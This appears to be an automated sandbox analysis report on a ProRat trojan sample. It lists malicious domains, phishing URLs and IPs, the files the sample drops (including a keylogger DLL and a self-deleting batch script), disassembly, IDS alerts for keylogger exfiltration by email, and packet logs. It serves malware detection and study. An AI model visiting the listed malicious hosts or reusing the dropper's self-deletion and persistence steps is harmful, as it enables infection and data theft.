	SecuriteInfo.com.DeepScan.Generic.Trojan.Genesis.Marte.A.13AE7AAD.23805.8574.dll	Get hash	malicious	Unknown	Browse	rth-do.com/hittest.php?a=mRJCdzdZQ3tx6Ua&id=0
	SecuriteInfo.com.DeepScan.Generic.Trojan.Genesis.Marte.A.EBB5E5E1.21310.16662.dll	Get hash	malicious	Unknown	Browse	rth-do.com/hittest.php?a=uAKVl04unz2lbtl&id=0
	Naxal_VPN_Version2.2_Setup.exe	Get hash	malicious	Unknown	Browse	plainboardssixty.com/drive/bottom.php
	SecuriteInfo.com.DeepScan.Generic.Trojan.Genesis.Marte.A.8195694E.22079.3428.dll	Get hash	malicious	Raccoon Stealer v2	Browse	rth-do.com/hittest.php?a=moUsVdsbTL9vae1&id=0
	REMITTANCECopy.htm	Get hash	malicious	HTMLPhisher	Browse	aliveshomes.com/lucky/36eb6e0.php
	rInquiry_1120236.exe	Get hash	malicious	FormBook	Browse	www.reallinvest.fun/ee2q/?nP=Gxl4i4VPEJ&V488=a/reG6bg5UPn6t/4QZBl+O9l6W3I8tgdGK/5ucVFfVOxYEV6bp23HIoYeW6fvW/SnjFy
	1.png	Get hash	malicious	Unknown	Browse	www.czeromedia.com/shop/evo-x/drivetrain-evo-x/clutch-drivetrain-evo-x/act-clutch-kits-evo-x/
	http://officesf920bb459cfd51cffed7dbaa1c55c15b4b9ebb459cfd51cffed7dbaa.officesfsafe.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	officesf920bb459cfd51cffed7dbaa1c55c15b4b9ebb459cfd51cffed7dbaa.officesfsafe.workers.dev/
	https://skills.ink/3oql/#1gvv8jp	Get hash	malicious	GRQ Scam	Browse	mainbitmining.space/
	http://soimaz.com/scxcbnm/sharepoint-msn/secureserver%20officefile/xvbh-view/onedrive-RD46/	Get hash	malicious	HTMLPhisher	Browse	soimaz.com/scxcbnm/sharepoint-msn/secureserver%20officefile/xvbh-view/onedrive-RD46/images/bg.jpg
	KMSpico_VJF1rvLdY.exe	Get hash	malicious	Unknown	Browse	razdufd.online/new/net_api
	KMSpico_VJF1rvLdY.exe	Get hash	malicious	Unknown	Browse	razdufd.online/new/net_api
	VSiqfvLPjE.exe	Get hash	malicious	Nymaim	Browse	str.skymiddle.host/track_inl2.php?tim=1685450974&poid=2550&p=1.25
	VSiqfvLPjE.exe	Get hash	malicious	Nymaim	Browse	str.skymiddle.host/track_inl2.php?tim=1685450974&poid=2550&p=1.25
	http://www.benimbahis.net/wp-adm/edy.	Get hash	malicious	HTMLPhisher	Browse	www.benimbahis.net/wp-adm/edy.

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mta7.am0.yahoodns.net	file.msg.scr.exe	Get hash	malicious	Unknown	Browse	67.195.204.79
	l3Qj8QhTYZ.exe	Get hash	malicious	Phorpiex	Browse	98.136.96.76
	.exe	Get hash	malicious	Unknown	Browse	67.195.228.111
	file.log.exe	Get hash	malicious	Unknown	Browse	98.136.96.77
	data.log.exe	Get hash	malicious	Unknown	Browse	67.195.204.72
	message.elm.exe	Get hash	malicious	Unknown	Browse	67.195.204.77
	message.txt.exe	Get hash	malicious	Unknown	Browse	67.195.204.74
	test.dat.exe	Get hash	malicious	Unknown	Browse	67.195.228.94
	Update-KB7390-x86.exe	Get hash	malicious	Unknown	Browse	67.195.204.73
	Update-KB6734-x86.exe	Get hash	malicious	Unknown	Browse	67.195.204.79
	Update-KB5058-x86.exe	Get hash	malicious	Unknown	Browse	67.195.204.79
	Update-KB78-x86.exe	Get hash	malicious	Unknown	Browse	98.136.96.91
	file.txt.exe	Get hash	malicious	Unknown	Browse	67.195.228.111
	Update-KB250-x86.exe	Get hash	malicious	Unknown	Browse	98.136.96.75
	Update-KB2984-x86.exe	Get hash	malicious	Unknown	Browse	98.136.96.91
	doc.msg.exe	Get hash	malicious	Unknown	Browse	67.195.204.79
	DWVByMCYL8.exe	Get hash	malicious	Raccoon RedLine SmokeLoader Tofsee Xmrig	Browse	67.195.228.106
	f9aoawyl4M.exe	Get hash	malicious	Raccoon RedLine SmokeLoader Tofsee	Browse	67.195.228.110
	JSYInjvdnM.exe	Get hash	malicious	Raccoon RedLine SmokeLoader Tofsee Xmrig	Browse	98.136.96.76
	jpLE7j0Z6t.exe	Get hash	malicious	Raccoon RedLine SmokeLoader Tofsee Vidar	Browse	98.136.96.91

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MAILRU-ASMailRuRU	7DsyDtl3IE.elf	Get hash	malicious	Unknown	Browse	94.100.184.251
	image.png.vbs	Get hash	malicious	Unknown	Browse	94.100.180.160
	cspD1Q5lhI.elf	Get hash	malicious	Mirai	Browse	178.237.22.120
	VpmlE95WTF.elf	Get hash	malicious	Mirai	Browse	178.237.22.106
	EiB0RJl0Lt.elf	Get hash	malicious	Mirai	Browse	178.237.22.100
	76Av2W6EGi.elf	Get hash	malicious	Mirai	Browse	5.61.23.78
	fs7AQcREFX.exe	Get hash	malicious	Pushdo	Browse	217.69.139.150
	3PhaPyhbT7.elf	Get hash	malicious	Mirai	Browse	94.100.184.217
	https://cloud.mail.ru/stock/8s1BMvkSACWtRsTUtG8M7ASM	Get hash	malicious	HTMLPhisher	Browse	94.100.180.209
	Server.dll.exe	Get hash	malicious	Unknown	Browse	178.237.20.14
	image.png.vbs	Get hash	malicious	Unknown	Browse	217.69.139.160
	http://modulucsleanrooms.com	Get hash	malicious	HTMLPhisher	Browse	217.69.139.59
	sora.arm.elf	Get hash	malicious	Mirai	Browse	178.237.22.129
	pDFzNKMWN2.exe	Get hash	malicious	Unknown	Browse	94.100.180.106
	http://sc-datasink.ffe390afd658c19dcbf707e0597b846d.de	Get hash	malicious	HTMLPhisher	Browse	5.181.61.0
	orcod.arm7.elf	Get hash	malicious	Mirai	Browse	128.140.169.95
	zWUjp3ropQ.elf	Get hash	malicious	Mirai	Browse	45.84.133.106
	6gjnnBAbpc.exe	Get hash	malicious	Pushdo	Browse	217.69.139.150
	file.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	94.100.180.31
	Product_specifications.exe	Get hash	malicious	AgentTesla	Browse	94.100.180.160
CLOUDFLARENETUS	Scan089765.html	Get hash	malicious	HTMLPhisher	Browse	104.18.10.207
	http://update.microsoft-support.net	Get hash	malicious	Unknown	Browse	1.1.1.1
	DriverPack-17-Online.exe	Get hash	malicious	Unknown	Browse	188.114.97.7
	Maersk DBL83139.ZRUlT.hTmL.ZRUlT.HtMl	Get hash	malicious	Unknown	Browse	104.17.25.14
	1don7S2tZf.apk	Get hash	malicious	Unknown	Browse	104.21.12.211
	https://www.acmecia.com	Get hash	malicious	Unknown	Browse	104.17.24.14
	Xudzxq.exe	Get hash	malicious	Snake Keylogger	Browse	162.159.134.233
	LkviXaVF4T.rtf	Get hash	malicious	SmokeLoader	Browse	188.114.96.7
	Suntrust_Bank_MT103847594826190623.docx.doc	Get hash	malicious	SmokeLoader	Browse	188.114.96.7
	INVOICE_NO._1164667916.docx.doc	Get hash	malicious	AgentTesla, NSISDropper	Browse	188.114.96.7
	https://l24.im/GroS1w#CqjqYgBNhVbZVogMISkbplU32a	Get hash	malicious	Unknown	Browse	188.114.96.7
	https://mbtthospitality.com/bedside-alarm-clocks/	Get hash	malicious	Unknown	Browse	104.21.22.198
	https://mbtthospitality.com/	Get hash	malicious	Unknown	Browse	172.67.192.33
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, Vidar	Browse	172.67.181.144
	SecuriteInfo.com.DeepScan.Generic.Trojan.Genesis.Marte.A.91E2684C.13689.18205.dll	Get hash	malicious	Unknown	Browse	188.114.96.7
	SecuriteInfo.com.DeepScan.Generic.Trojan.Genesis.Marte.A.1A87B4BB.2985.872.dll	Get hash	malicious	Unknown	Browse	188.114.96.7
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader	Browse	188.114.96.7
	libqrencode.dll	Get hash	malicious	Unknown	Browse	188.114.96.7
	J0U1XBEbum.elf	Get hash	malicious	Moobot	Browse	8.48.135.191
	hXvuUBgGKw.elf	Get hash	malicious	Moobot	Browse	104.24.160.154

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\Desktop\7B8WRB~1.EXE.bat

Download File

Process:	C:\Users\user\Desktop\7b8wRbnmKu.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.977214597292691
Encrypted:	false
SSDEEP:	3:xBAlOWXp5vSdyBNpo5PWXp5vSdyrjp2sy:xBXWXpFSduNpoNWXpFSdUlxy
MD5:	0A13E9A62E8E9405D803F54E243A167D
SHA1:	47CD15DCB5D5FD41C74D58861A9435C7068C30CC
SHA-256:	0BF803D10D7EE843272635962086945FBA71A9AD1C011BED214516B970E8A5FA
SHA-512:	49395E7E9CDBC03A03E6C2BFE8420752531FBECF6D5F1C0BC2CDA449491F9CD01B85355548D622D89718FB483F6AB3EBF9413D948DEBE92AD4FAA51F34650BFC
Malicious:	false
Reputation:	low
Preview:	:1..del "C:\Users\user\Desktop\7B8WRB~1.EXE"..if exist "C:\Users\user\Desktop\7B8WRB~1.EXE" goto 1..del %0..

C:\Users\user\Desktop\7b8wRbnmKu.jpg

Download File

Process:	C:\Users\user\Desktop\7b8wRbnmKu.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=2, software=Picasa], baseline, precision 8, 1600x900, components 3
Category:	dropped
Size (bytes):	253743
Entropy (8bit):	7.9692715442601
Encrypted:	false
SSDEEP:	6144:nXD8ZPlvN3J3TbAwRQflNTe6KMK06X5vs:XDQdjT0x3iO6Jvs
MD5:	F72FD95C4D369AE3C52C074E263EB290
SHA1:	EC39EBEFCCB743166A315511CFD42B9E55C67B4A
SHA-256:	60C3A4FD0677994E9896B8444C9BE217F049520D305E80FB1EB61AC3510E639C
SHA-512:	EE614DF7830DD60CF30B75039707EDCF3819A76235564AF73A4D688A1D28D54C941262489E21A9B18F80A578A90F6830302DEB2D456AB8E91E89B3D0B45A4C4E
Malicious:	false
Reputation:	low
Preview:	......JFIF..............Exif..II.......1.......&...i...........X...Picasa............0220........@.........................................................(.......................................H.......H.............JFIF.............C..............................................!........."$".$.......C.......................................................................`....".......................................=.........................!.1.AQ.."aq.#2...B...br..$c......................................0........................!1AQ.."2q.a.....#BR...............?...5,..f(.`1.G....U9."..i.4...'.~.n../.e.y..Q."..+.}.....U\....3..O.a.tub.S....>....1.g....h.b.t..p.[....T.S..h......l..j....".u]....0.F.x..8...L.cf ....U,.L.%\|d...f..S.p\|.'.......$.J.$q.5%..X.T.. .."..AB....A...4.S.Q...r;q..qf.0 r8....~..j.....rC\|..0R..w....8.8.}[ISz...H.W..nRO...^.icQ....J..3..SA;.=..}.h1..*.q<.01Y....{...........W...#..R@V.5.\|..............0.W.YN......]..bq.Z....1. .0..#.K...2.......f

C:\Windows\SysWOW64\fservice.exe

Download File

Process:	C:\Windows\SysWOW64\lncom.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	347692
Entropy (8bit):	7.899347788168615
Encrypted:	false
SSDEEP:	6144:WF8jQMQtt0JiWBFSbEbu+jaTvacPbkgo54UCodblRGxc1xDtFWA9rmNlBBgwq:WF8jAtYB22azaLgzaLUcDDWCrmM
MD5:	B0692CE1EEE360FD4F246BDA4355BCFF
SHA1:	9F82126A7FA5E827A438DF973F0F3AA5E55CA9C1
SHA-256:	3A8C891BADA8CB99BFF895CFB13E1EFA6F6BD67778ACB0FC3BFC40C622D4A338
SHA-512:	98A2064DBD48F88486679244C730CB9E837A6157798BF535EF76C1EB87CE76AF2E657D03686973125BB7C12FF22FE338FAB2BFE7A333113887B416B406FF2750
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L...*.B.................@........................@.............................................. ...................@...t......`...........................................................T.......................................................UPX0....................................UPX1.....@.......<..................@....rsrc................@..............@..............................................................................................................3.03.UPX!....

C:\Windows\SysWOW64\lncom.exe

Download File

Process:	C:\Users\user\Desktop\7b8wRbnmKu.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	347692
Entropy (8bit):	7.899347788168615
Encrypted:	false
SSDEEP:	6144:WF8jQMQtt0JiWBFSbEbu+jaTvacPbkgo54UCodblRGxc1xDtFWA9rmNlBBgwq:WF8jAtYB22azaLgzaLUcDDWCrmM
MD5:	B0692CE1EEE360FD4F246BDA4355BCFF
SHA1:	9F82126A7FA5E827A438DF973F0F3AA5E55CA9C1
SHA-256:	3A8C891BADA8CB99BFF895CFB13E1EFA6F6BD67778ACB0FC3BFC40C622D4A338
SHA-512:	98A2064DBD48F88486679244C730CB9E837A6157798BF535EF76C1EB87CE76AF2E657D03686973125BB7C12FF22FE338FAB2BFE7A333113887B416B406FF2750
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L...*.B.................@........................@.............................................. ...................@...t......`...........................................................T.......................................................UPX0....................................UPX1.....@.......<..................@....rsrc................@..............@..............................................................................................................3.03.UPX!....

C:\Windows\SysWOW64\lncom_.jpg

Download File

Process:	C:\Users\user\Desktop\7b8wRbnmKu.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=2, software=Picasa], baseline, precision 8, 1600x900, components 3
Category:	dropped
Size (bytes):	253743
Entropy (8bit):	7.9692715442601
Encrypted:	false
SSDEEP:	6144:nXD8ZPlvN3J3TbAwRQflNTe6KMK06X5vs:XDQdjT0x3iO6Jvs
MD5:	F72FD95C4D369AE3C52C074E263EB290
SHA1:	EC39EBEFCCB743166A315511CFD42B9E55C67B4A
SHA-256:	60C3A4FD0677994E9896B8444C9BE217F049520D305E80FB1EB61AC3510E639C
SHA-512:	EE614DF7830DD60CF30B75039707EDCF3819A76235564AF73A4D688A1D28D54C941262489E21A9B18F80A578A90F6830302DEB2D456AB8E91E89B3D0B45A4C4E
Malicious:	false
Reputation:	low
Preview:	......JFIF..............Exif..II.......1.......&...i...........X...Picasa............0220........@.........................................................(.......................................H.......H.............JFIF.............C..............................................!........."$".$.......C.......................................................................`....".......................................=.........................!.1.AQ.."aq.#2...B...br..$c......................................0........................!1AQ.."2q.a.....#BR...............?...5,..f(.`1.G....U9."..i.4...'.~.n../.e.y..Q."..+.}.....U\....3..O.a.tub.S....>....1.g....h.b.t..p.[....T.S..h......l..j....".u]....0.F.x..8...L.cf ....U,.L.%\|d...f..S.p\|.'.......$.J.$q.5%..X.T.. .."..AB....A...4.S.Q...r;q..qf.0 r8....~..j.....rC\|..0R..w....8.8.}[ISz...H.W..nRO...^.icQ....J..3..SA;.=..}.h1..*.q<.01Y....{...........W...#..R@V.5.\|..............0.W.YN......]..bq.Z....1. .0..#.K...2.......f

C:\Windows\SysWOW64\reginv.dll

Download File

Process:	C:\Windows\services.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	3.8865847741013937
Encrypted:	false
SSDEEP:	384:cFqS7spWkPT5NGqu1mlWVtCMv6RyZbWwANgNoUozW+51B:cFNWvT5JOCRsWwA+iUo
MD5:	D4A3F90E159FFBCBC4F9740DE4B7F171
SHA1:	0542F5D1E2C23DCA8D90766B3A8537DC3880E5C9
SHA-256:	2200DD5F83D2FB8C5D3994206A4FA9FF34B4CBFE56ED39A9A03C954CF45D8F77
SHA-512:	5493BEB50B5F7D8EC52F32718D01696916AE173456005D0C1294CE695161CE5004AFF58EE3892BF5DB0F9B23720146A6D3AE8FFBCBBD81F84D894FDC8CF75A94
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|...8...8...8..............1...Z...=...8..........<......9...Rich8...................PE..L...7.B...........!.....@...@...............P......................................................................pY..r...LT..<....................................................................................P...............................text....1.......@.................. ..`.rdata.......P.......P..............@..@.data...`....`.......`..............@....HookSec.....p.......p..............@....reloc..&...........................@..B[* ProRat - Trojan Horse - Coded by PRO Group - Made in Turkey *]...............................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\winkey.dll

Download File

Process:	C:\Windows\services.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	1.779785222859163
Encrypted:	false
SSDEEP:	96:N29vgScOs9K2roji5OLC4PGCq2cfD78uWjJxl:N2NgHOyK2rojiyqPkx
MD5:	43E7D9B875C921BA6BE38D45540FB9DD
SHA1:	F22A73FC0D4AA3EA6C0B8F61D974B028F308ACC4
SHA-256:	F1B2B0ABE844E6BA812C7F8709A463A7F6C56FA6AC38D376A0739CC3469F795B
SHA-512:	2E74E23C0875B69B82319391C392132F28F4EB45AA412805130382498AE48969A06A2B3A7528B626FA7D7DDB6B006F19F0EF8D73CF73CB9A0C0DF44A21077622
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|.u.8c..8c..8c..Z\|..<c......9c...\|..<c..8c..hc...\|..>c...e..9c...\|..>c..Rich8c..........PE..L.....qB...........!.........`............... .......................................................................&......@#..d....`.......................p....................................................... ..P............................text...V........................... ..`.rdata..#.... ....... ..............@..@.data...$"...0.......0..............@....rsrc........`.......@..............@..@.reloc.......p.......P..............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System\sservice.exe

Download File

Process:	C:\Windows\SysWOW64\lncom.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	347692
Entropy (8bit):	7.899347788168615
Encrypted:	false
SSDEEP:	6144:WF8jQMQtt0JiWBFSbEbu+jaTvacPbkgo54UCodblRGxc1xDtFWA9rmNlBBgwq:WF8jAtYB22azaLgzaLUcDDWCrmM
MD5:	B0692CE1EEE360FD4F246BDA4355BCFF
SHA1:	9F82126A7FA5E827A438DF973F0F3AA5E55CA9C1
SHA-256:	3A8C891BADA8CB99BFF895CFB13E1EFA6F6BD67778ACB0FC3BFC40C622D4A338
SHA-512:	98A2064DBD48F88486679244C730CB9E837A6157798BF535EF76C1EB87CE76AF2E657D03686973125BB7C12FF22FE338FAB2BFE7A333113887B416B406FF2750
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L...*.B.................@........................@.............................................. ...................@...t......`...........................................................T.......................................................UPX0....................................UPX1.....@.......<..................@....rsrc................@..............@..............................................................................................................3.03.UPX!....

C:\Windows\services.exe

Download File

Process:	C:\Windows\SysWOW64\fservice.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	347692
Entropy (8bit):	7.899347788168615
Encrypted:	false
SSDEEP:	6144:WF8jQMQtt0JiWBFSbEbu+jaTvacPbkgo54UCodblRGxc1xDtFWA9rmNlBBgwq:WF8jAtYB22azaLgzaLUcDDWCrmM
MD5:	B0692CE1EEE360FD4F246BDA4355BCFF
SHA1:	9F82126A7FA5E827A438DF973F0F3AA5E55CA9C1
SHA-256:	3A8C891BADA8CB99BFF895CFB13E1EFA6F6BD67778ACB0FC3BFC40C622D4A338
SHA-512:	98A2064DBD48F88486679244C730CB9E837A6157798BF535EF76C1EB87CE76AF2E657D03686973125BB7C12FF22FE338FAB2BFE7A333113887B416B406FF2750
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L...*.B.................@........................@.............................................. ...................@...t......`...........................................................T.......................................................UPX0....................................UPX1.....@.......<..................@....rsrc................@..............@..............................................................................................................3.03.UPX!....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.936417010450962
TrID:	Win32 Executable (generic) a (10002005/4) 99.39% UPX compressed Win32 Executable (30571/9) 0.30% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	7b8wRbnmKu.exe
File size:	607602
MD5:	e39b8c5521c7df36ee92ead621a58ed9
SHA1:	c438abeca3808df05a4d8b33a2e5ae950cf7faf6
SHA256:	24cb55a207a9eb0047a6acf94c92ea7eac1540e6cece817915e6594887318961
SHA512:	8893053780797e8fd997c976e73473fa50c1885507458fb77f7189b5a117d757eaf6141dfbb4fc52aea0abe7be87258666d58aa61fad92bde19f465121442f9d
SSDEEP:	12288:sNF8jAtYB22azaLgzaLUcDDWCrmwDQdjT0x3iO6Jv7:kF8jAq1aSgWLUsyYLQdjTY4z
TLSH:	4FD423415786CD39C5B610752502F238AA522AEFDC7B0CA7F2D8A20335B9DCB3771A67
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......UL.Y.-...-...-...2...-...-...-..s2...-...2...-...+...-..Rich.-..........................PE..L...M}EB...........................

File Icon


Icon Hash:	b2b169130729b2c4

Static PE Info

General

Entrypoint:	0x4016a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x42457D4D [Sat Mar 26 15:18:37 2005 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	24476665fc64c5bd2f686ee32b80ff80

Entrypoint Preview

Instruction
sub esp, 0000030Ch
push esi
push edi
push 000003B8h
call 00007FF320D48083h
push 000003B8h
call 00007FF320D48079h
push 004010B8h
push 004010B8h
call 00007FF320D47B9Ah
add esp, 10h
cmp eax, 02h
je 00007FF320D481B2h
push ebx
lea eax, dword ptr [esp+00000214h]
push 00000104h
push eax
push 00000000h
call dword ptr [0040100Ch]
lea ecx, dword ptr [esp+0Ch]
push 00000104h
lea edx, dword ptr [esp+00000218h]
push ecx
push edx
call dword ptr [00401000h]
lea edi, dword ptr [esp+0Ch]
or ecx, FFFFFFFFh
xor eax, eax
lea edx, dword ptr [esp+00000110h]
repne scasb
not ecx
sub edi, ecx
push 004010B4h
mov eax, ecx
mov esi, edi
mov edi, edx
lea edx, dword ptr [esp+00000114h]
shr ecx, 02h
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 03h
push edx
rep movsb
mov edi, 004010ACh
or ecx, FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebx, ecx
mov edi, edx
or ecx, FFFFFFFFh
repne scasb
mov ecx, ebx
dec edi
shr ecx, 02h
rep movsd
mov ecx, ebx
and ecx, 03h
rep movsb
call dword ptr [00001028h]

Rich Headers

Programming Language:

[LNK] VS98 (6.0) imp/exp build 8168
[C++] VS98 (6.0) build 8168
[RES] VS98 (6.0) cvtres build 1720

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17f0	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2000	0x960	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x48	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x96a	0xa00	False	0.55	data	5.9772431715898415	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2000	0x960	0xa00	False	0.3171875	data	2.6579966755690396	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x20a0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152	English	United States	0.3348375451263538
RT_GROUP_ICON	0x2948	0x14	data	English	United States	1.15

Imports

DLL	Import
SHELL32.dll	ShellExecuteA
KERNEL32.dll	GetShortPathNameA, CopyFileA, GetSystemDirectoryA, GetModuleFileNameA, WinExec
MSVCRT.dll	exit, rewind, fclose, getc, fopen, ??2@YAPAXI@Z, putc, fseek, fprintf

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3188.114.97.749700802803278 06/19/23-11:19:14.587143	TCP	2803278	ETPRO TROJAN Prorat.19.i Checkin	49700	80	192.168.2.3	188.114.97.7
192.168.2.367.195.204.7949703252802174 06/19/23-11:19:15.552596	TCP	2802174	ETPRO TROJAN ProRat Keylogger Infection Report via Email	49703	25	192.168.2.3	67.195.204.79

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 19, 2023 11:19:14.570425987 CEST	49700	80	192.168.2.3	188.114.97.7
Jun 19, 2023 11:19:14.572788000 CEST	49701	53	192.168.2.3	8.8.8.8
Jun 19, 2023 11:19:14.586818933 CEST	80	49700	188.114.97.7	192.168.2.3
Jun 19, 2023 11:19:14.587007046 CEST	49700	80	192.168.2.3	188.114.97.7
Jun 19, 2023 11:19:14.587142944 CEST	49700	80	192.168.2.3	188.114.97.7
Jun 19, 2023 11:19:14.587227106 CEST	53	49701	8.8.8.8	192.168.2.3
Jun 19, 2023 11:19:14.589369059 CEST	49701	53	192.168.2.3	8.8.8.8
Jun 19, 2023 11:19:14.589431047 CEST	49701	53	192.168.2.3	8.8.8.8
Jun 19, 2023 11:19:14.603456974 CEST	80	49700	188.114.97.7	192.168.2.3
Jun 19, 2023 11:19:14.604055882 CEST	53	49701	8.8.8.8	192.168.2.3
Jun 19, 2023 11:19:14.604146957 CEST	49701	53	192.168.2.3	8.8.8.8
Jun 19, 2023 11:19:14.611681938 CEST	49702	80	192.168.2.3	178.237.20.14
Jun 19, 2023 11:19:14.623790979 CEST	80	49700	188.114.97.7	192.168.2.3
Jun 19, 2023 11:19:14.623866081 CEST	80	49700	188.114.97.7	192.168.2.3
Jun 19, 2023 11:19:14.623913050 CEST	80	49700	188.114.97.7	192.168.2.3
Jun 19, 2023 11:19:14.623960972 CEST	80	49700	188.114.97.7	192.168.2.3
Jun 19, 2023 11:19:14.623971939 CEST	49700	80	192.168.2.3	188.114.97.7
Jun 19, 2023 11:19:14.624011040 CEST	80	49700	188.114.97.7	192.168.2.3
Jun 19, 2023 11:19:14.624012947 CEST	49700	80	192.168.2.3	188.114.97.7
Jun 19, 2023 11:19:14.624059916 CEST	80	49700	188.114.97.7	192.168.2.3
Jun 19, 2023 11:19:14.624109030 CEST	49700	80	192.168.2.3	188.114.97.7
Jun 19, 2023 11:19:14.624439001 CEST	80	49700	188.114.97.7	192.168.2.3
Jun 19, 2023 11:19:14.624499083 CEST	49700	80	192.168.2.3	188.114.97.7
Jun 19, 2023 11:19:14.637803078 CEST	49703	25	192.168.2.3	67.195.204.79
Jun 19, 2023 11:19:14.666794062 CEST	80	49702	178.237.20.14	192.168.2.3
Jun 19, 2023 11:19:14.666922092 CEST	49702	80	192.168.2.3	178.237.20.14
Jun 19, 2023 11:19:14.667105913 CEST	49702	80	192.168.2.3	178.237.20.14
Jun 19, 2023 11:19:14.721739054 CEST	80	49702	178.237.20.14	192.168.2.3
Jun 19, 2023 11:19:14.721769094 CEST	80	49702	178.237.20.14	192.168.2.3
Jun 19, 2023 11:19:14.750233889 CEST	25	49703	67.195.204.79	192.168.2.3
